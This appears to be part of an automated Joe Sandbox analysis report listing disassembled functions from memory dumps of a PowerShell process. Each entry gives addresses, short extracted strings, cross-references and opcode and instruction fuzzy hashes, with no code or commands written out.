Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q
API String ID: 0-4210068417
Opcode ID: 4688c82aa08d09a63af35a68aaca8a6101191469df115b601022310b832c4c2a
Instruction ID: 9244ddb398c968e0108a3059c2518b696a4d7393972075ac34331b14fa41a4e5
Opcode Fuzzy Hash: 4688c82aa08d09a63af35a68aaca8a6101191469df115b601022310b832c4c2a
Instruction Fuzzy Hash: B5026CB4B512089FE714CB98C454F99BBB2FB88314F14C099EA05AF395CB72EC46CB56

Function 07B31100 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

$q, xrefs: 07B31168
$q, xrefs: 07B31112
$q, xrefs: 07B3115C

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: 771fe084aa128799429f6c072f6f8391a635b9baeb0023a86c386437ba283ccc
Instruction ID: a61169505101c19b785d23cd9d9fbfd004c8812f012999a6a1bd7a13a7eea023
Opcode Fuzzy Hash: 771fe084aa128799429f6c072f6f8391a635b9baeb0023a86c386437ba283ccc
Instruction Fuzzy Hash: 63216BF1310B0E5BFB38556E9C11BB7B6DEEBC5611F24806AE905CB381CD75C8858361

Function 07B30820 Relevance: 3.8, Strings: 3, Instructions: 73COMMON

Download Yara Rule

Strings

$q, xrefs: 07B308AF
4'q, xrefs: 07B308D4
$q, xrefs: 07B30893

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$$q$$q
API String ID: 0-3789935075
Opcode ID: 2884ec5d52ac84a45cad836908a5bcc98e7da99c90431ec4b4e9e9f5a2bb905c
Instruction ID: d0d84e2f0d0a557c837e41a11e94ea70ff100dbed59f3c232c0294df8c8050c2
Opcode Fuzzy Hash: 2884ec5d52ac84a45cad836908a5bcc98e7da99c90431ec4b4e9e9f5a2bb905c
Instruction Fuzzy Hash: 5121E7F1A19346CFFB25EF28D5082AA7B72EF42210F1941E7C8489B151D33195C5C7E2

Function 07B3CCA8 Relevance: 3.0, Strings: 2, Instructions: 503COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B3D1A1
4'q, xrefs: 07B3D195

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 6606a1bfaf951f9cff92e5a247a51d76ed3ec8bad3045c65163a543f1737c95c
Instruction ID: 3795aa5c2fc0b28da9519ac89f1079eb1d344fec6251cc56af260097352f35a3
Opcode Fuzzy Hash: 6606a1bfaf951f9cff92e5a247a51d76ed3ec8bad3045c65163a543f1737c95c
Instruction Fuzzy Hash: 212271B0B003149FE715DB54C855F9ABBB2EB89304F518099D909AF781CB72ED86CF92

Function 07B3D9D4 Relevance: 2.8, Strings: 2, Instructions: 333COMMON

Download Yara Rule

Strings

(f,m, xrefs: 07B3DB53
(f,m, xrefs: 07B3DB3D

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: (f,m$(f,m
API String ID: 0-1652301193
Opcode ID: feea96417ec1ad9459d84dfb1ead497a8eb06fa3a6cc57140ddd3f194a13d129
Instruction ID: 594a4507e8ac099bec4303b3a0f94eaa86eb58ac22d580bf0f71133ae9fcc6dd
Opcode Fuzzy Hash: feea96417ec1ad9459d84dfb1ead497a8eb06fa3a6cc57140ddd3f194a13d129
Instruction Fuzzy Hash: 06E14FB4B403189FEB64DB54C855BAABB72BB8A304F5081D8D509AB345CB32ED85CF52

Function 07B310E4 Relevance: 2.6, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

$q, xrefs: 07B31112
$q, xrefs: 07B3115C

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: c74da13b73a322ff8b9f957f82f2f1cf18e696981f61561865f25f39fd5b1dde
Instruction ID: fa6680d883c7d75f57bae3d3500e86bb6a8ffa7e5000d4977bd7c084c53df955
Opcode Fuzzy Hash: c74da13b73a322ff8b9f957f82f2f1cf18e696981f61561865f25f39fd5b1dde
Instruction Fuzzy Hash: E22127F1314F8E6FFB35492D5811BB23FAA9F82611F2881DBE944DB293C52589C9C321

Function 07B335EB Relevance: 1.9, Strings: 1, Instructions: 657COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B33D5A

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 04efb240715056316910ad19cf10a37dfee186d4bfda1474c255587d086b28a8
Instruction ID: a10feb82390937626e063244ed904e169c59130e344dcc96a9627fb64fae08e9
Opcode Fuzzy Hash: 04efb240715056316910ad19cf10a37dfee186d4bfda1474c255587d086b28a8
Instruction Fuzzy Hash: 8A525DB4B002049FE714CB58C854FAABBB2FB89305F15C1D9DA099F395CB72ED858B51

Function 07B340A2 Relevance: 1.9, Strings: 1, Instructions: 644COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B33D5A

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: ad5a6f6b034dd30cd54e05c92d576167c02732c61560dfbbdf260e6eaaca6b43
Instruction ID: 3f6f5c13b716ebd6ca751b6e4ea861d73e015c553e2322d82d5f19988ba653b2
Opcode Fuzzy Hash: ad5a6f6b034dd30cd54e05c92d576167c02732c61560dfbbdf260e6eaaca6b43
Instruction Fuzzy Hash: DE524CB4B002149FE764CB18C854F6ABBB2FB88305F14C1D9DA099F395CB72ED858B95

Function 07B335B6 Relevance: 1.9, Strings: 1, Instructions: 628COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B33D5A

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: eb56951c3f74e71693df613cd7b3cb983f2fb683e65a5688d3bd5f694c4679bc
Instruction ID: b27f9a65c140bb3300b23bc8e500fd711a016d4ce1d309a9e3608f81dabe0fd6
Opcode Fuzzy Hash: eb56951c3f74e71693df613cd7b3cb983f2fb683e65a5688d3bd5f694c4679bc
Instruction Fuzzy Hash: DB426CB4B002049FE714CB58C854FAABBB2FB89305F11C199DA09AF395CB72ED85CB51

Function 07B3D49B Relevance: 1.9, Strings: 1, Instructions: 621COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B3D195

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: eb8b3f8e40ac4dc735f794efd3c50df0d3f11de2ac41681d9c85a6aa147311ac
Instruction ID: 8a8304d3e94219eb5061044efd75e714d786f18aa2ff215171a856d73127d20a
Opcode Fuzzy Hash: eb8b3f8e40ac4dc735f794efd3c50df0d3f11de2ac41681d9c85a6aa147311ac
Instruction Fuzzy Hash: 244250B4B003149FE715DB14C854FAABBB2EB89304F50C099D909AF795CB72ED86CB91

Function 07B341B5 Relevance: 1.7, Strings: 1, Instructions: 487COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B33D5A

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: ff70009813e6997413f79817100fe221c6d831eb8e75d17e1726f097991ae485
Instruction ID: b0370a01aff2ca91903be099c4d4d9d49e163f6f4ad5b0d5f01e47002f7611ad
Opcode Fuzzy Hash: ff70009813e6997413f79817100fe221c6d831eb8e75d17e1726f097991ae485
Instruction Fuzzy Hash: 2D2260B4B002149FE764CB54C854F6ABBB2FB88305F10C199DA09AF395CB72ED858F95

Function 07B3D582 Relevance: 1.7, Strings: 1, Instructions: 468COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B3D195

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 9ff28ea1453db5ffc17c0c0eeaa0ca5b3a8e7ec56bf370d67b3ac8c179dd67e6
Instruction ID: 647ec6af49c9d02cea59bff07c0bd89f747c9d3cfee17a490680cc3ff4dcb408
Opcode Fuzzy Hash: 9ff28ea1453db5ffc17c0c0eeaa0ca5b3a8e7ec56bf370d67b3ac8c179dd67e6
Instruction Fuzzy Hash: CD1251B4B003149FE715DB14C854F9ABBB2EB89304F518099D909AF781CB72ED86CB92

Function 09420040 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b05f38121a666f4314bfe5254b308460fe333e8b96b71156ca015f5a1d4e46e
Instruction ID: 7dda02ae89fe2268141951bb860e949b4e232108bbeb7b4741cd2a0296c313da
Opcode Fuzzy Hash: 6b05f38121a666f4314bfe5254b308460fe333e8b96b71156ca015f5a1d4e46e
Instruction Fuzzy Hash: 91C1FA34A01218DFDB15CF98D484A9EBBF2FF88314F64815AE805AB365C775ED86CB90

Function 07B30AF0 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92831efa8b3397d192e4b34a2e6608e5f18d52373245e9ca15de0f948c1d9878
Instruction ID: 19a86ebde64475cee3dc4e004ed799a7d352cfde9e700cca12eaba2c98086fb9
Opcode Fuzzy Hash: 92831efa8b3397d192e4b34a2e6608e5f18d52373245e9ca15de0f948c1d9878
Instruction Fuzzy Hash: 1E314CB17002058FE714AB79D8013AEF7D6EF84214F14857AE915DB340EB32DD85C791

Function 09420257 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d29e60f7fd85d46000f8823ee048f562f01a42af620860fdd62b49cf367fcf2
Instruction ID: 2e676b9c91b53344794fe423ef76ee70b833d78fd6efc3e4f3fb53c72014d2e3
Opcode Fuzzy Hash: 3d29e60f7fd85d46000f8823ee048f562f01a42af620860fdd62b49cf367fcf2
Instruction Fuzzy Hash: 3351D634A00219EFDB15CFA4D494A9DFBF2BF88314F688559E805AB361C775ED82CB90

Function 07B348F0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77a406fb12951e07ff44271ef6cf9d4031608e216f687da21c1f74773cde4552
Instruction ID: fbab21a240edc5e3f7b9ab368659728218253afc994f3f383cf44d5b31fdbc9b
Opcode Fuzzy Hash: 77a406fb12951e07ff44271ef6cf9d4031608e216f687da21c1f74773cde4552
Instruction Fuzzy Hash: AA31B674B40204AFE714DBA4C865FAF7AA2AF84305F15C058EA016F7D1CF71ED468B96

Function 07B3618C Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f074ff490d80ef4bbc1d2f727e7446da893b53b125893323055b494711d0e835
Instruction ID: 9cbd11ad946fd2af2448ecfcdba9f1e33f7c59c366a02b8adcd10712ed28831e
Opcode Fuzzy Hash: f074ff490d80ef4bbc1d2f727e7446da893b53b125893323055b494711d0e835
Instruction Fuzzy Hash: 8D3149F1750206ABEB254A2598117B6FBA1DBC6215F0480AED902CB685DF35E8D6C393

Function 07B30FD0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a84eb9372f0da130435934489df1618d358079df3817a6383211c7bb3d546675
Instruction ID: 4adf8bcbb268d95ddca72941bc9124cb225b81af1124e7ecd98365b87f528970
Opcode Fuzzy Hash: a84eb9372f0da130435934489df1618d358079df3817a6383211c7bb3d546675
Instruction Fuzzy Hash: 9C2137F530034EABE7685A7D5815B37B69AEFC4311F24C06AA506DF3C1CD76D8858361

Function 07B30FB4 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455b82586496e6f5eb685f8128dfb09a7f7624acd5219c3f6d2db795b7a8cd50
Instruction ID: c98fec2d288e3492b99cccba82ac315d7ab4fa499d0b93b5dd0ade6c841c4806
Opcode Fuzzy Hash: 455b82586496e6f5eb685f8128dfb09a7f7624acd5219c3f6d2db795b7a8cd50
Instruction Fuzzy Hash: 3D2168F53043896FFB251A7958217723FAADF86200F2880DAE945DF2D2C935CDC98325

Function 07B349CD Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0920d6eb8e89e1f1b10627e63d2bb2d544a4755d83705a8c92d0afd5f0c4ffb7
Instruction ID: 9b320476f014b0e39a70d96a7f918884c5e5842c8410405db296b7555d678f34
Opcode Fuzzy Hash: 0920d6eb8e89e1f1b10627e63d2bb2d544a4755d83705a8c92d0afd5f0c4ffb7
Instruction Fuzzy Hash: 4B21A1B0B40204AFEB18DBA4C555BAEBB72EB84305F20C159E9116F3D1CB72ED41CB96

Function 07B30DC0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae954890a55447bd16d3e40e960607001988bba56c9147b3f694ef9767331bbe
Instruction ID: 8d3bf6f95453166fb38a0d87efe72a4237be46bc0e5882d4d522e371485921c6
Opcode Fuzzy Hash: ae954890a55447bd16d3e40e960607001988bba56c9147b3f694ef9767331bbe
Instruction Fuzzy Hash: 9301F7B670022A8BE724696AE40067BF7D7DFD5222F14C47BE945C7241D636D885C7A0

Function 09420364 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f0846783e3ff4c1887d46f6ef08e8afd39e78bcd032d1a6d2e3435facb99c2
Instruction ID: ae2f8071cd9a763a43388b49ae8312b76713c1ef6d9c2a0c04e0206bae1d3a9f
Opcode Fuzzy Hash: 25f0846783e3ff4c1887d46f6ef08e8afd39e78bcd032d1a6d2e3435facb99c2
Instruction Fuzzy Hash: 3A11B334A00219EFDB15CFA8D884E9DFBF2BF48314F688159E405AB361C775A886CB90

Function 07B38151 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44468498c4e82b8618185cf00dc62999a88686d3f8e21d6eb3224a5c2fffac4
Instruction ID: a9874398b234adbc48b2ab692048d9b0338f2a72a6f699e384edb0a70ea057e4
Opcode Fuzzy Hash: a44468498c4e82b8618185cf00dc62999a88686d3f8e21d6eb3224a5c2fffac4
Instruction Fuzzy Hash: FF0149F1F502141FF22916641C127AFA712DBD4614F1000BADE01AF386CA358C4683EB

Function 0942055C Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff180d1bb51733096ca63a23a6b04a5f94fe6701ed2f58e4877dd5d2d38bad62
Instruction ID: 2ba6420479b78ed5cb9213837cd7a62b7507b080726aa15a107744503e19c09b
Opcode Fuzzy Hash: ff180d1bb51733096ca63a23a6b04a5f94fe6701ed2f58e4877dd5d2d38bad62
Instruction Fuzzy Hash: 29F0F935A011159FDB15CB88D890EBEF776FF88324B108159E915972A0C736AC52CB54

Function 09421EE2 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6759542f33b55b25d0e2530d761441ef46918ff7dcb12cf8ac8a9cde18c80fd
Instruction ID: fd2e16c543cdba18dafe8316d0258ce97e6b75ce8104e5d535ff963861f2e05d
Opcode Fuzzy Hash: c6759542f33b55b25d0e2530d761441ef46918ff7dcb12cf8ac8a9cde18c80fd
Instruction Fuzzy Hash: A7F01D35A00519AFCB15DB88DD409EDF7B6FF8C320B248119E915B7660C732AD62DB54

Function 094214FB Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a0360bba08711271588fe690472da17a06dfd8596cdd43f1c4b875958b06763
Instruction ID: faea65b1996835d618a74e70cec610a0ab92d0431ecc10e9c54e7b0c2324ef9f
Opcode Fuzzy Hash: 6a0360bba08711271588fe690472da17a06dfd8596cdd43f1c4b875958b06763
Instruction Fuzzy Hash: FAF0F435A00114AFDB15CB88D890EBEF776FF88324F248159EA15A72A0C736AC52CB60

Function 09420F34 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65c5f0f35c626c0a4a2f134eb18f3e893321019693d22bec72ad3e68d719f441
Instruction ID: cb6febea14fba64946cab6323dc11d8cc174059f8335161f47bb22ebf156175e
Opcode Fuzzy Hash: 65c5f0f35c626c0a4a2f134eb18f3e893321019693d22bec72ad3e68d719f441
Instruction Fuzzy Hash: F7F01D35A00118AFCB15DB88E8409ADF7B2FB88224B248159E919A3660C732AC52DB54

Function 09420F07 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1536960530.0000000009420000.00000040.00000800.00020000.00000000.sdmp, Offset: 09420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9420000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4a2d5de9454183ded71a69e4e281560cf2f6af0cbbfd1072975a2f871a75c3
Instruction ID: 0dbdf3d11d7465fe1d376a748b8ba17d9ee7b516273e0fa2bddf37ef0fc16ee1
Opcode Fuzzy Hash: 9c4a2d5de9454183ded71a69e4e281560cf2f6af0cbbfd1072975a2f871a75c3
Instruction Fuzzy Hash: 4BF0FE35E00218AFCF11DB88D8409EEFB76FB88224B248155E619A3261C7329852DB50

Function 07B31CB6 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97b446bde440e6b6c42d70df1121d521dc7a7f2098c6fceb512c854a8782574
Instruction ID: 42dc0316e5d699a7c2fd1d775136f8f8abfff6c78b49878abfed5f233e618abf
Opcode Fuzzy Hash: c97b446bde440e6b6c42d70df1121d521dc7a7f2098c6fceb512c854a8782574
Instruction Fuzzy Hash: B7A011302020808BCA00CA08C8A2800F320AB80208B28C0A8AA088F282CB23EA03CA00

Non-executed Functions

Function 07B3F61D Relevance: 19.0, Strings: 15, Instructions: 285COMMON

Download Yara Rule

Strings

84*m, xrefs: 07B3F7FC
84*m, xrefs: 07B3F700
84*m, xrefs: 07B3F6F6
(q, xrefs: 07B3F86E
tPq, xrefs: 07B3F844
84*m, xrefs: 07B3F7F2
tPq, xrefs: 07B3F749
(q, xrefs: 07B3F878
tPq, xrefs: 07B3F850
tPq, xrefs: 07B3F755
4'q, xrefs: 07B3F91C
$q, xrefs: 07B3F675
4'q, xrefs: 07B3F928
(q, xrefs: 07B3F8AD
(q, xrefs: 07B3F80A

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$84*m$84*m$84*m$84*m$tPq$tPq$tPq$tPq$$q$(q$(q$(q$(q
API String ID: 0-2767683112
Opcode ID: 47e8fe28335ffc1b8d9a5c1114b35c582cd46efd4c7ab8cf2956a8b36d28e4a4
Instruction ID: 03c85a6b8490c92ff57487b71bef8e5295760fc9157548b39e751bdfaaeada6e
Opcode Fuzzy Hash: 47e8fe28335ffc1b8d9a5c1114b35c582cd46efd4c7ab8cf2956a8b36d28e4a4
Instruction Fuzzy Hash: B4A1B5B1F0021ADFEB248F65D41577AB7A2FF89311F288599E945AF290CB31EC81C791

Function 07B3EDA5 Relevance: 14.0, Strings: 11, Instructions: 209COMMON

Download Yara Rule

Strings

84*m, xrefs: 07B3EF11
d%q, xrefs: 07B3EF83
d%q, xrefs: 07B3EF1F
tPq, xrefs: 07B3EF59
84*m, xrefs: 07B3EF07
d%q, xrefs: 07B3EFC2
4'q, xrefs: 07B3F003
4'q, xrefs: 07B3EFF7
tPq, xrefs: 07B3EF65
d%q, xrefs: 07B3EF8D
$q, xrefs: 07B3EE40

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$84*m$84*m$d%q$d%q$d%q$d%q$tPq$tPq$$q
API String ID: 0-880922802
Opcode ID: 732ae105af06e689f601597c76341284d1414037e73fc44bb15d000122e71864
Instruction ID: 46eb63730c1c0b480e8919f486874b1ac563cb41d1d0cd3f164bec040a8d3557
Opcode Fuzzy Hash: 732ae105af06e689f601597c76341284d1414037e73fc44bb15d000122e71864
Instruction Fuzzy Hash: 8371D7F1B002169FFB258F69D41477ABBA2EF89311F1885DAE9419F284DB31DC81C751

Function 07B37980 Relevance: 8.9, Strings: 7, Instructions: 190COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B37A2A
$q, xrefs: 07B37B07
$q, xrefs: 07B37B32
4'q, xrefs: 07B37A36
"m, xrefs: 07B37B83
$q, xrefs: 07B37B3E
"m, xrefs: 07B37B75

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q$"m$"m
API String ID: 0-3679235952
Opcode ID: 25f60da7389afba09a24a0c048cd305a8c60dc10713ce645e8b1229cb7d13486
Instruction ID: 521effb2eedea1485075d81eb57a4c8ab598ac69f5f97ad0f86d60fe50fbc711
Opcode Fuzzy Hash: 25f60da7389afba09a24a0c048cd305a8c60dc10713ce645e8b1229cb7d13486
Instruction Fuzzy Hash: F1515BF170430A9FE72496799450367FBB2EFC5211F2881EBE455CB241EE32D982C792

Function 07B3B450 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$q, xrefs: 07B3B4A3
$q, xrefs: 07B3B4F3
$q, xrefs: 07B3B4D7
$q, xrefs: 07B3B487
$q, xrefs: 07B3B4E7
$q, xrefs: 07B3B4CB

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 66694d7fa90b9df22856f8e3a3848e926baced1a82c539e7b6881e481015bd37
Instruction ID: 69e6adff5a49cf3cd46606d15fce125cecb6d727ec43c871e04b79870b3e4d44
Opcode Fuzzy Hash: 66694d7fa90b9df22856f8e3a3848e926baced1a82c539e7b6881e481015bd37
Instruction Fuzzy Hash: 013128F6B043478BFB354A66A460277F7A1EB85311B2944FFD8428B24ADE35D885C352

Function 07B3EEA6 Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

d%q, xrefs: 07B3EF83
tPq, xrefs: 07B3EF59
d%q, xrefs: 07B3EF1F
84*m, xrefs: 07B3EF07
4'q, xrefs: 07B3EFF7
d%q, xrefs: 07B3EF8D

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$84*m$d%q$d%q$d%q$tPq
API String ID: 0-1818601799
Opcode ID: 845e1493628e5e03cfa2b7a029c765cc9a90c12b1b202f30d1aed97698bc9690
Instruction ID: 05a1965d9f65642094912dbe83eee606a148c169397f7efb1a7267ce40738b55
Opcode Fuzzy Hash: 845e1493628e5e03cfa2b7a029c765cc9a90c12b1b202f30d1aed97698bc9690
Instruction Fuzzy Hash: 1A319FF4B002069FEB24DF54D454A69FBA2FF88711F698196E905AF340C772EC81CB91

